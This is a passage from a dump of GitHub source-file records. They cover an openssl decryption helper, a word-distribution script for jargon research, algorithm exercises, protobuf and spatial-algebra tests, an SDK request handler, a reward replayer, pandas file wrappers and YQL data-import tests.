'-in', str(src), '-out', str(dst), '-k', self.config['enc-key']\n ]\n\n try:\n subprocess.check_output(openssl, stderr=subprocess.STDOUT, preexec_fn=os.setpgrp)\n return True\n except subprocess.CalledProcessError as e:\n logging.error(f'Decryption failed: {e.stdout.decode(\"utf-8\").splitlines()[0]}')\n if dst.is_file() and dst.stat().st_size == 0:\n dst.unlink()\n return False\n\n## encrypt\n# openssl enc -aes-256-cbc -pbkdf2 -iter 100000 -in 'videofile.mp4' -out test.enc -k supersicherespasswort\n## decrypt\n# openssl enc -d -aes-256-cbc -pbkdf2 -iter 100000 -in test.enc -out test.mp4\n","repo_name":"birdie1/tapebackup","sub_path":"functions/encryption.py","file_name":"encryption.py","file_ext":"py","file_size_in_byte":6653,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"72"} +{"seq_id":"70865848554","text":"import os\nimport argparse\nimport numpy as np\nimport logging\n\nfrom scipy.spatial.distance import jensenshannon\nfrom scipy.stats import entropy\nfrom tqdm import tqdm\nfrom itertools import chain\nfrom multiprocessing.pool import Pool\nfrom gensim.corpora.dictionary import Dictionary\nfrom smart_open import open\n\nfrom word_dist.src.utils.preprocess import get_neighbor_unigram, filter_dict\nfrom word_dist.src.utils.smoothing import dirichlet_smoothing, laplace_smoothing\nfrom word_dist.src.utils.multiprocessing import generate_batch_dataset, reduce_results\nfrom word_dist.src.utils.env import ROOT_DIR\n\nlogging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)\n\nparser = argparse.ArgumentParser(description='Word Distribution')\nparser.add_argument('--dataset', type=str, default='clean_clean', help='dataset name')\nparser.add_argument('--dark_file', type=str, default='dark.txt', help='dark file name from which you want to calculate word distribution')\nparser.add_argument('--clean_file', type=str, default='clean.txt', help='clean file name from which you want to calculate word distribution')\nparser.add_argument('--num_neighbors', type=int, default=10, help='the number of left/right neighbors sampled for each neighbor')\nparser.add_argument('--vocab_size', type=int, default=10000, help='how many most common/random word you want')\nparser.add_argument('--alpha', type=float, default=1.0, help='laplace smoothing factor')\nparser.add_argument('--mu', type=int, default=2000, help='dirichlet smoothing factor')\nparser.add_argument('--smoothing', type=str, default='', help='smoothing method to use, choose from: \"laplace\", \"dirichlet\"')\nparser.add_argument('--batch_size', type=int, default=100, help='batch size for multiprocessing')\nargs = parser.parse_args()\n\n\ndef calc_distance(data):\n distances = []\n for dist_dark, unigram_clean in data:\n row = []\n for col, dist_clean in enumerate(unigram_clean):\n row.append(distance_fcn(dist_dark, dist_clean))\n distances.append(row)\n return distances\n\n\ndef get_keep_tokens(dictionary):\n sim_dark_term_mapping = {word[1:]: word for word in dictionary.itervalues() if word.startswith('_')}\n keep_tokens = list(chain(sim_dark_term_mapping.values(), sim_dark_term_mapping.keys()))\n return keep_tokens\n\n\nif __name__ == '__main__':\n data_path = os.path.join(ROOT_DIR, \"data\", args.dataset)\n output_path = os.path.join(data_path, 'distribution', args.dataset)\n os.makedirs(output_path, exist_ok=True)\n\n data_dark_file = os.path.join(data_path, args.dark_file)\n data_clean_file = os.path.join(data_path, args.clean_file)\n \n if args.smoothing == 'laplace':\n output_file_dist = os.path.join(output_path, f'distance_{args.smoothing}_{args.alpha}')\n elif args.smoothing == 'dirichlet':\n output_file_dist = os.path.join(output_path, f'distance_{args.smoothing}_{args.mu}')\n else:\n output_file_dist = os.path.join(output_path, 'distance_js')\n\n dict_file = os.path.join(data_path, 'dict_all.model')\n\n file_unigram_dark = os.path.join(output_path, 'unigram_dark.npy')\n file_unigram_clean = os.path.join(output_path, 'unigram_clean.npy')\n file_unigram_dark_all = os.path.join(output_path, 'unigram_dark_all.npy')\n file_unigram_clean_all = os.path.join(output_path, 'unigram_clean_all.npy')\n\n if os.path.exists(dict_file) and os.path.exists(file_unigram_dark)\\\n and os.path.exists(file_unigram_clean) and os.path.exists(file_unigram_dark_all) \\\n and os.path.exists(file_unigram_clean_all):\n logging.info('loading precalculated results...')\n unigram_dark = np.load(file_unigram_dark)\n unigram_clean = np.load(file_unigram_clean)\n unigram_dark_all = np.load(file_unigram_dark_all)\n unigram_clean_all = np.load(file_unigram_clean_all)\n\n dictionary = Dictionary.load(dict_file)\n dictionary = filter_dict(args.vocab_size, dictionary, get_keep_tokens(dictionary))\n\n else:\n logging.info('no calculated files found, recomputing...')\n logging.info('loading files...')\n with open(data_dark_file, 'r') as f1, open(data_clean_file, 'r') as f2:\n logging.info('loading dark text...')\n dark_text = [line.split() for line in f1.readlines()]\n logging.info('loading clean text...')\n clean_text = [line.split() for line in f2.readlines()]\n logging.info('load file done')\n\n if os.path.exists(dict_file):\n dictionary = Dictionary.load(dict_file)\n else:\n logging.info('creating the dictionary...')\n dictionary = Dictionary(dark_text)\n dictionary.add_documents(clean_text)\n dictionary.save(dict_file)\n\n dictionary = filter_dict(args.vocab_size, dictionary, get_keep_tokens(dictionary))\n logging.info('dictionary created')\n\n logging.info('building neighbor unigrams...')\n\n if os.path.exists(file_unigram_dark) and os.path.exists(file_unigram_dark_all):\n unigram_dark = np.load(file_unigram_dark)\n unigram_dark_all = np.load(file_unigram_dark_all)\n else:\n unigram_dark, unigram_dark_all = get_neighbor_unigram(dictionary, dark_text, args.num_neighbors)\n np.save(file_unigram_dark, unigram_dark)\n np.save(file_unigram_dark_all, unigram_dark_all)\n\n if os.path.exists(file_unigram_clean) and os.path.exists(file_unigram_clean_all):\n unigram_clean = np.load(file_unigram_clean)\n unigram_clean_all = np.load(file_unigram_clean_all)\n else:\n unigram_clean, unigram_clean_all = get_neighbor_unigram(dictionary, clean_text, args.num_neighbors)\n np.save(file_unigram_clean, unigram_clean)\n np.save(file_unigram_clean_all, unigram_clean_all)\n\n logging.info('neighbor unigrams built')\n\n if args.smoothing == 'laplace':\n unigram_dark = laplace_smoothing(unigram_dark, args.alpha)\n unigram_clean = laplace_smoothing(unigram_clean, args.alpha)\n distance_fcn = entropy\n distance_fcn_name = 'kl'\n elif args.smoothing == 'dirichlet':\n unigram_dark = dirichlet_smoothing(unigram_dark, unigram_dark_all, args.mu)\n unigram_clean = dirichlet_smoothing(unigram_clean, unigram_clean_all, args.mu)\n distance_fcn = entropy\n distance_fcn_name = 'kl'\n else:\n distance_fcn = jensenshannon\n distance_fcn_name = 'js'\n\n logging.info(f'calculating distance of two distributions using {distance_fcn_name}-divergence(dark-clean)')\n dataset = generate_batch_dataset(args.batch_size, unigram_dark, unigram_clean)\n\n with Pool() as pool:\n results = list(tqdm(pool.imap(calc_distance, dataset), total=len(dataset)))\n\n logging.info(f'Batches processed: {len(results)}')\n\n distance = reduce_results(results, vocab_size=len(dictionary))\n\n logging.info('distance calculated')\n np.save(output_file_dist, distance)\n","repo_name":"dom-s/dark-jargon","sub_path":"word_dist/src/commands/distribution.py","file_name":"distribution.py","file_ext":"py","file_size_in_byte":7009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27852778297","text":"import sys,collections;\nn,m = map(int,sys.stdin.readline().split())\nboard = [list(sys.stdin.readline().strip()) for _ in range(n)]\nvisited = [[False] * m for _ in range(n)]\ndx = [0,0,-1,1] ; dy = [-1,1,0,0]\n\ndef bfs(i,j) :\n q = collections.deque([[i,j]])\n visited[i][j] = True\n while q :\n x,y = q.popleft()\n for i in range(4) :\n nx,ny = x + dx[i], y + dy[i]\n\n if board[nx][ny] == \"#\" : continue\n if board[nx][ny] == '.' and not visited[nx][ny] :\n visited[nx][ny] = True ;q.append([nx,ny])\n if board[nx][ny] == \"+\" :\n while 1 :\n nx += dx[i] ; ny += dy[i]\n if board[nx][ny] == \"#\" :\n nx -= dx[i] ; ny -= dy[i] ;break\n elif board[nx][ny] == \".\" : break\n elif board[nx][ny] == \"+\" : continue\n if not visited[nx][ny] :\n visited[nx][ny] = True ; q.append([nx,ny])\n\nfor i in range(n) :\n for j in range(m) :\n if board[i][j] == \"W\" and not visited[i][j] :\n bfs(i,j)\n\nfor i in range(n) :\n for j in range(m) :\n if visited[i][j] :\n print(board[i][j] , end = \"\")\n else :\n if board[i][j] == '.' :\n print(\"P\",end = \"\")\n else :\n print(board[i][j], end = \"\")\n print()","repo_name":"parksangji/PS_python3","sub_path":"0스터디0506-0513/3.16441(bfs_반례찾기애매).py","file_name":"3.16441(bfs_반례찾기애매).py","file_ext":"py","file_size_in_byte":1202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41595038907","text":"# Kodowanie Huffmana\n# Specyfikacja:\n# Dane:\n# tekst - ciąg małych liter\n# Wynik:\n# Kody każdej z liter występującej w tekście\n# Zakodowany tekst wejściowy\n# Stopień kompresji\n\n# Ogólny schemat algorytmu:\n# 1. Tworzymy pary: (znak, ilość wystąpień)\n# 2. Budujemy drzewko kodowania: zaczynamy od łączenia najrzadziej występujących znaków\n# 3. Odczytujemy kody z drzewa: idąc w lewo przypisujemy 0, idąc w prawo przypisujemy 1\n# 4. Wykorzystujemy kody do zakodowania tekstu\n\nclass Wezel:\n znak = \"\"\n czestosc = 0\n lewy = None\n prawy = None\n\n def __init__(self, znak, czestosc, lewy, prawy):\n self.znak = znak\n self.czestosc = czestosc\n self.lewy = lewy\n self.prawy = prawy\n\n def wypisz(self, kod):\n if self.lewy is None:\n print(self.znak, kod)\n return\n\n self.lewy.wypisz(kod + \"0\")\n self.prawy.wypisz(kod + \"1\")\n\n\ndef sort_wezel(wezel):\n return wezel.czestosc\n\ntekst = \"aaaabbaabbaaacccaaaabbaaaaccdddaaaaaaeee\"\n\nczestosci = dict()\n\nfor znak in tekst:\n # Jeżeli znak jest już w słowniku\n if znak in czestosci:\n czestosci[znak] += 1\n else:\n czestosci[znak] = 1\n\n# Lista do przechowywania węzłów drzewa\nelementy = []\n\nfor znak in czestosci:\n w = Wezel(znak, czestosci[znak], None, None)\n elementy.append(w)\n\nelementy.sort(key=sort_wezel)\n\n# for el in elementy:\n# print(el.znak, el.czestosc)\n\nwhile len(elementy) > 1:\n w1 = elementy[0]\n w2 = elementy[1]\n # Usuwamy dwa pierwsze elementy\n elementy.pop(0)\n elementy.pop(0)\n w3 = Wezel(\"\", w1.czestosc + w2.czestosc, w2, w1)\n elementy.append(w3)\n elementy.sort(key=sort_wezel)\n\nkorzen = elementy[0]\nkorzen.wypisz(\"\")","repo_name":"blackbat13/matura_inf","sub_path":"algorytmy/kodowanie_huffmana.py","file_name":"kodowanie_huffmana.py","file_ext":"py","file_size_in_byte":1743,"program_lang":"python","lang":"pl","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"22053859218","text":"\"\"\"\nTests for descriptor_to_message_class\n\"\"\"\n\n# Standard\nimport os\nimport tempfile\n\n# Third Party\nfrom google.protobuf import message\nfrom google.protobuf.internal.enum_type_wrapper import EnumTypeWrapper\n\n# Local\nfrom .conftest import temp_dpool\nfrom py_to_proto.descriptor_to_message_class import descriptor_to_message_class\nfrom py_to_proto.jtd_to_proto import jtd_to_proto\n\n\ndef test_descriptor_to_message_class_generated_descriptor(temp_dpool):\n \"\"\"Make sure that a generated descriptor can be used to create a class\"\"\"\n descriptor = jtd_to_proto(\n \"Foo\",\n \"foo.bar\",\n {\n \"properties\": {\n \"foo\": {\"type\": \"boolean\"},\n \"bar\": {\"type\": \"float32\"},\n }\n },\n descriptor_pool=temp_dpool,\n )\n Foo = descriptor_to_message_class(descriptor)\n assert issubclass(Foo, message.Message)\n foo = Foo(foo=True, bar=1.234)\n assert foo.foo is True\n assert foo.bar is not None # NOTE: There are precision errors comparing == 1.234\n\n # Make sure the class can be serialized\n serialized_content = Foo.to_proto_file()\n assert \"message Foo\" in serialized_content\n\n\ndef test_descriptor_to_message_class_write_proto_file(temp_dpool):\n \"\"\"Make sure that each message class has write_proto_files attached to it\n and that it correctly writes the protobufs to the right named files.\n \"\"\"\n Foo = descriptor_to_message_class(\n jtd_to_proto(\n name=\"Foo\",\n package=\"foobar\",\n jtd_def={\n \"properties\": {\n \"foo\": {\n \"type\": \"boolean\",\n },\n }\n },\n descriptor_pool=temp_dpool,\n )\n )\n\n Bar = descriptor_to_message_class(\n jtd_to_proto(\n name=\"Bar\",\n package=\"foobar\",\n jtd_def={\n \"properties\": {\n \"bar\": {\n \"type\": Foo.DESCRIPTOR,\n },\n },\n },\n descriptor_pool=temp_dpool,\n ),\n )\n\n with tempfile.TemporaryDirectory() as workdir:\n Foo.write_proto_file(workdir)\n Bar.write_proto_file(workdir)\n assert set(os.listdir(workdir)) == {\n Foo.DESCRIPTOR.file.name,\n Bar.DESCRIPTOR.file.name,\n }\n with open(os.path.join(workdir, Bar.DESCRIPTOR.file.name), \"r\") as handle:\n bar_content = handle.read()\n assert f'import \"{Foo.DESCRIPTOR.file.name}\"' in bar_content\n\n\ndef test_descriptor_to_message_class_write_proto_file_no_dir(temp_dpool):\n \"\"\"Make sure that each message class has write_proto_files attached to it\n and that it correctly writes the protobufs to the right named files.\n Also ensures that the directory gets created if it doesn't exist\n \"\"\"\n Foo = descriptor_to_message_class(\n jtd_to_proto(\n name=\"Foo\",\n package=\"foobar\",\n jtd_def={\n \"properties\": {\n \"foo\": {\n \"type\": \"boolean\",\n },\n }\n },\n descriptor_pool=temp_dpool,\n )\n )\n\n with tempfile.TemporaryDirectory() as workdir:\n protos_dir_path = os.path.join(workdir, \"protos\")\n Foo.write_proto_file(protos_dir_path)\n assert set(os.listdir(protos_dir_path)) == {\n Foo.DESCRIPTOR.file.name,\n }\n\n\ndef test_descriptor_to_message_class_nested_messages(temp_dpool):\n \"\"\"Make sure that nested messages are wrapped and added to the parents\"\"\"\n top = descriptor_to_message_class(\n jtd_to_proto(\n name=\"Top\",\n package=\"foobar\",\n jtd_def={\n \"properties\": {\n \"ghost\": {\n \"properties\": {\n \"boo\": {\n \"type\": \"string\",\n }\n }\n }\n }\n },\n descriptor_pool=temp_dpool,\n )\n )\n assert issubclass(top, message.Message)\n assert issubclass(top.Ghost, message.Message)\n\n\ndef test_descriptor_to_message_class_nested_enums(temp_dpool):\n \"\"\"Make sure that nested enums are wrapped and added to the parents\"\"\"\n top = descriptor_to_message_class(\n jtd_to_proto(\n name=\"Top\",\n package=\"foobar\",\n jtd_def={\n \"properties\": {\n \"bat\": {\n \"enum\": [\"VAMPIRE\", \"BASEBALL\"],\n }\n }\n },\n descriptor_pool=temp_dpool,\n )\n )\n assert issubclass(top, message.Message)\n assert isinstance(top.Bat, EnumTypeWrapper)\n\n\ndef test_descriptor_to_message_class_top_level_enum(temp_dpool):\n \"\"\"Make sure that a top-level EnumDescriptor results in an EnumTypeWrapper\"\"\"\n top = descriptor_to_message_class(\n jtd_to_proto(\n name=\"Top\",\n package=\"foobar\",\n jtd_def={\"enum\": [\"VAMPIRE\", \"DRACULA\"]},\n descriptor_pool=temp_dpool,\n )\n )\n assert isinstance(top, EnumTypeWrapper)\n with tempfile.TemporaryDirectory() as workdir:\n top.write_proto_file(workdir)\n assert os.listdir(workdir) == [top.DESCRIPTOR.file.name]\n\n\ndef test_multiple_invocations_of_descriptor_to_message(temp_dpool):\n \"\"\"Ensure that invoking descriptor_to_message_class with the same descriptor\n returns the same instance of a class.\n \"\"\"\n descriptor = jtd_to_proto(\n \"Foo\",\n \"foo.bar\",\n {\n \"properties\": {\n \"foo\": {\"type\": \"boolean\"},\n \"bar\": {\"type\": \"float32\"},\n }\n },\n descriptor_pool=temp_dpool,\n )\n Foo = descriptor_to_message_class(descriptor)\n foo = Foo(foo=True, bar=1.234)\n\n Bar = descriptor_to_message_class(descriptor)\n bar = Bar(foo=True, bar=1.234)\n\n assert Foo is Bar\n assert Foo == Bar\n assert id(Foo) == id(Bar)\n assert foo == bar\n","repo_name":"IBM/py-to-proto","sub_path":"tests/test_descriptor_to_message_class.py","file_name":"test_descriptor_to_message_class.py","file_ext":"py","file_size_in_byte":6104,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"72"} +{"seq_id":"32593072176","text":"# coding=utf-8\nfrom __future__ import unicode_literals\nimport requests\n\nfrom .response_handler import ResponseHandler\nfrom .exceptions import HttpException\n\n\nclass RequestHandler(object):\n\n def __init__(self, base_url):\n self.base_url = base_url\n self.headers = {\n \"Content-Type\": \"application/json\"\n }\n self.__last_response = None\n\n def add_header(self, header, value):\n self.headers[header] = value\n\n def call(self, url, method=\"get\", params=None, json=None, headers=None, output_as_stream=False,\n **kwargs):\n \"\"\"\n\n :param str|unicode url: api address\n :param str|unicode method: http verb - `post`, `get`, `delete`, `put`\n :param dict|None params: dictionary of data\n :param dict|None json: dictionary of body request\n :param dict|None headers: dictionary of headers\n :param bool output_as_stream: output as a stream\n \"\"\"\n base_url = kwargs.pop(\"base_url\", self.base_url)\n\n url = base_url + url\n params = self._prepare_params(params)\n headers = self._prepare_headers(headers)\n if kwargs.get(\"files\", None) is not None:\n headers.pop(\"Content-Type\", \"\")\n\n try:\n method = method.lower()\n if method == \"post\":\n self.__last_response = ResponseHandler(requests.post(url, data=params, json=json, headers=headers,\n **kwargs), stream=output_as_stream)\n elif method == \"put\":\n self.__last_response = ResponseHandler(requests.put(url, data=params, json=json, headers=headers),\n stream=output_as_stream)\n elif method == \"delete\":\n self.__last_response = ResponseHandler(requests.delete(url, headers=headers),\n stream=output_as_stream)\n else:\n self.__last_response = ResponseHandler(requests.get(url, params=params, headers=headers),\n stream=output_as_stream)\n\n return self.__last_response.get_result()\n except requests.exceptions.RequestException as e:\n raise HttpException(e)\n\n def last_response(self):\n \"\"\"\n get last response handler\n\n :return: sakku.response_handler.ResponseHandler\n \"\"\"\n return self.__last_response\n\n @staticmethod\n def _prepare_params(params=None):\n if params is None or type(params) is not dict:\n params = {}\n\n return params\n\n def _prepare_headers(self, headers=None):\n if headers is not None and type(headers) is dict:\n self.headers.update(headers)\n\n return self.headers\n","repo_name":"FanapSoft/sakku-python-sdk","sub_path":"sakku/request_handler.py","file_name":"request_handler.py","file_ext":"py","file_size_in_byte":2833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"29206467178","text":"import os\nfrom typing import Dict, Optional\n\nimport keyboard\nfrom rlgym.api import AgentID, ObsType, StateType, ActionType, RewardType\nfrom rlviser_py import rlviser_py\n\nfrom rl_state_tester.global_harvesters.callbacks import Callback\nfrom rl_state_tester.global_harvesters.global_harvesters import StateHarvester, RewardHarvester\nfrom rl_state_tester.utils.rewards.common_rewards import SplitCombinedReward\n\n\nclass RewardStateReplayer(Callback):\n\n def __init__(\n self,\n rendered: bool,\n combined_reward: SplitCombinedReward,\n state_harvester: Optional[StateHarvester] = None,\n reward_harvester: Optional[RewardHarvester] = None,\n\n ):\n self.state_harvester = state_harvester\n self.reward_harvester = reward_harvester\n self.current_state_index = 0\n self.nb_episodes = 0\n self.legends = [r.__class__.__name__ for r in combined_reward.reward_fns]\n self.max_len = max([len(name) for name in self.legends])\n self.playing = False\n self.rendered = rendered\n self.combined_reward = combined_reward\n\n if not self.state_harvester:\n self.state_harvester = StateHarvester()\n\n if not self.reward_harvester:\n self.reward_harvester = RewardHarvester()\n\n\n def _on_reset(self, obs: Dict[AgentID, ObsType], state: StateType, *args, **kwargs):\n self.state_harvester.on_reset(obs, state, args, kwargs)\n self.reward_harvester.on_reset(obs, state, args, kwargs)\n\n def _on_step(self,\n obs: Dict[AgentID, ObsType],\n action: Dict[AgentID, ActionType],\n reward: Dict[AgentID, RewardType],\n truncated: Dict[AgentID, bool],\n terminated: Dict[AgentID, bool],\n state: StateType,\n *args, **kwargs):\n self.state_harvester.on_step(obs, action, reward, terminated, truncated, state, args, kwargs)\n self.reward_harvester.on_step(obs, action, reward, terminated, truncated, state, args, kwargs)\n\n def _on_close(self, *args, **kwargs):\n self.state_harvester.on_close(args, kwargs)\n self.reward_harvester.on_close(args, kwargs)\n self._start_rendering()\n\n def _start_rendering(self):\n states = self.state_harvester.get_all_episodes()\n rewards = self.reward_harvester.get_all_rewards()\n\n self.current_state_index = 0\n self.nb_episodes = 0\n\n if self.rendered:\n rlviser_py.render_rlgym(states[self.nb_episodes][self.current_state_index])\n\n keyboard.on_press_key(\"right arrow\", lambda e: self._step_forward(states, rewards))\n keyboard.on_press_key(\"left arrow\", lambda e: self._step_backward(states, rewards))\n keyboard.on_press_key(\"p\", lambda e: self._play_from_step(states, rewards))\n\n print(\"Waiting for shift...\")\n keyboard.wait(\"shift\")\n\n def _print_rewards(self, state: StateType, rewards):\n for i, name in enumerate(state.cars.keys()):\n print(f\"Player {name}:\")\n\n for j, legend in enumerate(self.legends):\n print(\"\\t\", legend, \":\", rewards[name][j])\n # step = self.combined_reward.steps[i][self.nb_episodes][self.current_state_index] if self.combined_reward.steps[i] is not None else None\n # print(f\"\\t{legend: <{self.max_len}} : {float(rewards[i][j]):3f} \"\n # f\"{((step.value if step.value < 0 else ('+' + step.value)) + ':' + step.reason if isinstance(self.combined_reward.steps[i], list) else 'Nothing') if step else ''}\")\n\n def _step_forward(self, states, rewards):\n self.current_state_index += 1\n # Reset\n if states[self.nb_episodes].shape[0] <= self.current_state_index:\n if self.nb_episodes + 2 >= len(states):\n self.current_state_index -= 1\n if self.playing:\n self.playing = False\n return\n\n self.nb_episodes += 1\n self.current_state_index = 0\n print(\"Resetting to first state of next episode\")\n\n if self.rendered:\n rlviser_py.render_rlgym(states[self.nb_episodes][self.current_state_index])\n\n os.system(\"cls\")\n self._print_rewards(\n states[self.nb_episodes][self.current_state_index],\n rewards[self.nb_episodes][self.current_state_index]\n )\n\n def _step_backward(self, states, rewards):\n self.current_state_index -= 1\n # Reset\n if self.current_state_index < 0:\n if self.nb_episodes <= 0:\n self.current_state_index = 0\n return\n\n self.nb_episodes -= 1\n self.current_state_index = states[self.nb_episodes].shape[0] - 1\n print(\"Resetting to first state of next episode\")\n\n if self.rendered:\n rlviser_py.render_rlgym(states[self.nb_episodes][self.current_state_index])\n\n os.system(\"cls\")\n self._print_rewards(states[self.nb_episodes][self.current_state_index], rewards[self.nb_episodes][self.current_state_index])\n\n def _play_from_step(self, states, rewards):\n if self.playing:\n return\n\n self.playing = True\n while self.playing:\n self._step_forward(states, rewards)\n\n if keyboard.is_pressed(\"s\"):\n self.playing = False\n\n def _stop_playing(self):\n self.playing = False\n","repo_name":"MathieuSuchet/rl-state-tester","sub_path":"rl_state_tester/reward_state_replayer.py","file_name":"reward_state_replayer.py","file_ext":"py","file_size_in_byte":5452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42064301153","text":"import numpy as np\nimport pytest\nfrom airo_spatial_algebra.operations import _HomogeneousPoints, transform_points\nfrom airo_spatial_algebra.se3 import SE3Container\n\n\ndef test_helper_class_creation():\n point = np.array([1.0, 2, 3])\n hpoints = _HomogeneousPoints(point)\n assert hpoints._homogeneous_points.shape == (1, 4)\n assert hpoints._homogeneous_points[0, -1] == 1.0\n\n homogeneous_point = np.array([1, 2, 3, 1])\n with pytest.raises(ValueError):\n _HomogeneousPoints(homogeneous_point)\n\n points = np.arange(6).reshape(2, 3)\n hpoints = _HomogeneousPoints(points)\n assert hpoints._homogeneous_points.shape == (2, 4)\n # check that the scale is 1.0\n assert hpoints._homogeneous_points[0, -1] == 1.0\n\n wronglyshaped_points = np.arange(6).reshape(3, 2)\n with pytest.raises(ValueError):\n _HomogeneousPoints(wronglyshaped_points)\n\n\n@pytest.mark.parametrize(\"points\", [np.arange(6).astype(np.float32).reshape(2, 3), np.array([1.0, 2, 3])])\ndef test_helper_class_properties(points):\n hpoints = _HomogeneousPoints(points)\n assert np.isclose(points, hpoints.points).all()\n assert hpoints.homogeneous_points.shape == (points.size // 3, 4)\n\n\ndef test_transform_points():\n points = np.arange(6).astype(np.float32).reshape(2, 3)\n transform = SE3Container.random()\n transformed_points = transform_points(transform.homogeneous_matrix, points)\n assert np.isclose(transformed_points[0], transform.rotation_matrix @ points[0] + transform.translation).all()\n","repo_name":"airo-ugent/airo-mono","sub_path":"airo-spatial-algebra/test/test_operations.py","file_name":"test_operations.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"72"} +{"seq_id":"35939375692","text":"from typing import Literal, TypeAlias\n\nfrom typedpath.base import PathLikeLike, TypedFile\n\ntry:\n import pandas as pd\n\n PANDAS_AVAILABLE = True\nexcept ImportError:\n from unittest.mock import MagicMock\n\n pd = MagicMock()\n\n PANDAS_AVAILABLE = False\n\n\nclass PandasCsvFile(TypedFile):\n \"\"\"A file containing comma separated values (CSV).\"\"\"\n\n default_suffix = \".csv\"\n\n def __init__(self, path: PathLikeLike, *, encoding: str = \"utf-8\") -> None:\n super().__init__(path)\n assert (\n PANDAS_AVAILABLE\n ), \"Pandas does not appear to be installed on this system. Try: pip install pandas\"\n\n self._encoding = encoding\n\n def write(self, data: pd.DataFrame) -> None:\n data.to_csv(self.write_path(), encoding=self._encoding, index=False)\n\n def append(self, data: pd.DataFrame) -> None:\n if not self.pretty_path().exists():\n self.write(data)\n return\n\n with open(self.read_path(), \"ta\", encoding=self._encoding) as fp:\n data.to_csv(fp, index=False, header=False)\n\n def read(self) -> pd.DataFrame:\n return pd.read_csv(self.read_path(), encoding=self._encoding)\n\n\nclass PandasFeatherFile(TypedFile):\n \"\"\"A file containing data in the Apache Arrow Feather format.\"\"\"\n\n default_suffix = \".feather\"\n\n def __init__(self, path: PathLikeLike) -> None:\n super().__init__(path)\n assert (\n PANDAS_AVAILABLE\n ), \"Pandas does not appear to be installed on this system. Try: pip install pandas\"\n\n def write(self, data: pd.DataFrame) -> None:\n data.to_feather(self.write_path())\n\n def read(self) -> pd.DataFrame:\n return pd.read_feather(self.read_path())\n\n\nParquetEngine: TypeAlias = Literal[\"auto\", \"pyarrow\", \"fastparquet\"]\nParquetCompression: TypeAlias = Literal[\"snappy\", \"gzip\", \"brotli\", None]\n\n\nclass PandasParquetFile(TypedFile):\n \"\"\"A file containing data in the Apache Parquet format.\"\"\"\n\n default_suffix = \".parquet\"\n\n def __init__(\n self,\n path: PathLikeLike,\n *,\n engine: ParquetEngine = \"auto\",\n compression: ParquetCompression = \"snappy\",\n ) -> None:\n super().__init__(path)\n assert (\n PANDAS_AVAILABLE\n ), \"Pandas does not appear to be installed on this system. Try: pip install pandas\"\n\n self._engine = engine\n self._compression = compression\n\n def write(self, data: pd.DataFrame) -> None:\n data.to_parquet(self.write_path(), engine=self._engine, compression=self._compression)\n\n def read(self) -> pd.DataFrame:\n return pd.read_parquet(self.read_path(), engine=self._engine)\n","repo_name":"jesnie/typedpath","sub_path":"typedpath/pandas.py","file_name":"pandas.py","file_ext":"py","file_size_in_byte":2665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"88551239","text":"from __future__ import print_function\n\nimport datetime\nimport json\nimport mock\nimport sys\n\nfrom library.python import resource\nfrom yql_utils import yql_binary_path\n\nfrom crypta.graph.data_import.soup.lib import AddDaySoup\nfrom crypta.graph.data_import.soup.lib.task import SoupTask\nfrom crypta.lib.python.yql_runner.tests import canonize_output, clean_up, execute, load_fixtures, unmount\n\n\nclass FakeDate(datetime.date):\n\n \"\"\" Fake date to mock immutable builtins \"\"\"\n\n @classmethod\n def today(cls):\n return cls(2018, 9, 15)\n\n\n@mock.patch.dict(\"os.environ\", {\"YT_TOKEN\": \"TESTING\", \"ENV_TYPE\": \"TESTING\"})\n@clean_up(observed_paths=(\"//home\", \"//logs\"))\n@load_fixtures(\n (\"//home/crypta/fake/state/graph/v2/soup/day/idfa_mm_device_id_app-metrica_mm\", \"/fixtures/table_1.json\"),\n (\"//home/crypta/fake/state/graph/v2/soup/day/gaid_mm_device_id_app-metrica_mm\", \"/fixtures/table_2.json\"),\n (\"//home/crypta/fake/state/graph/v2/soup/day/mm_device_id_uuid_app-metrica_mm\", \"/fixtures/table_3.json\"),\n (\"//home/crypta/fake/state/graph/v2/soup/yandexuid_icookie_cookie_wl\", \"/fixtures/soup_wl.json\"),\n (\"//home/crypta/fake/state/graph/v2/soup/gaid_mm_device_id_app-metrica_mm\", \"/fixtures/soup_mm.json\"),\n # this table should not be in processed (should check is not recursive lookup)\n (\"//home/crypta/fake/state/graph/v2/soup/ids/yandexuid\", \"/fixtures/ids_yuid.json\"),\n)\n@canonize_output\ndef test_soup(local_yt):\n \"\"\" Should check is metrica parser correct \"\"\"\n print(\"Create YQL runner\", file=sys.stderr)\n # call app metrica day parser\n yql_task = AddDaySoup(\n soup_dir=\"//home/crypta/fake/state/graph/v2/soup\",\n date=\"2019-01-01\",\n throw_before_date=\"2018-12-20\",\n yt_proxy=\"localhost:{}\".format(local_yt.yt_proxy_port),\n pool=\"xx\",\n mrjob_binary=yql_binary_path(\"yql/tools/mrjob/mrjob\"),\n udf_resolver_binary=yql_binary_path(\"yql/tools/udf_resolver/udf_resolver\"),\n udfs_dir=\";\".join([yql_binary_path(\"yql/udfs\"), yql_binary_path(\"ydb/library/yql/udfs\")]),\n loglevel=\"INFO\",\n limit=None,\n is_embedded=True,\n )\n\n try:\n print(\"Start YQL runner\", file=sys.stderr)\n yql_task.run()\n except Exception:\n print(yql_task.render_query(), file=sys.stderr)\n raise\n\n def select_all(table):\n return list(local_yt.yt_client.read_table(table, format=\"json\"))\n\n output_tables = local_yt.yt_client.search(\n \"//home/crypta/fake/state/graph/v2/soup\", node_type=[\"table\"], follow_links=True\n )\n return {table: sorted(select_all(table)) for table in output_tables}\n\n\n@mock.patch(\"datetime.date\", FakeDate)\n@mock.patch(\"time.time\", 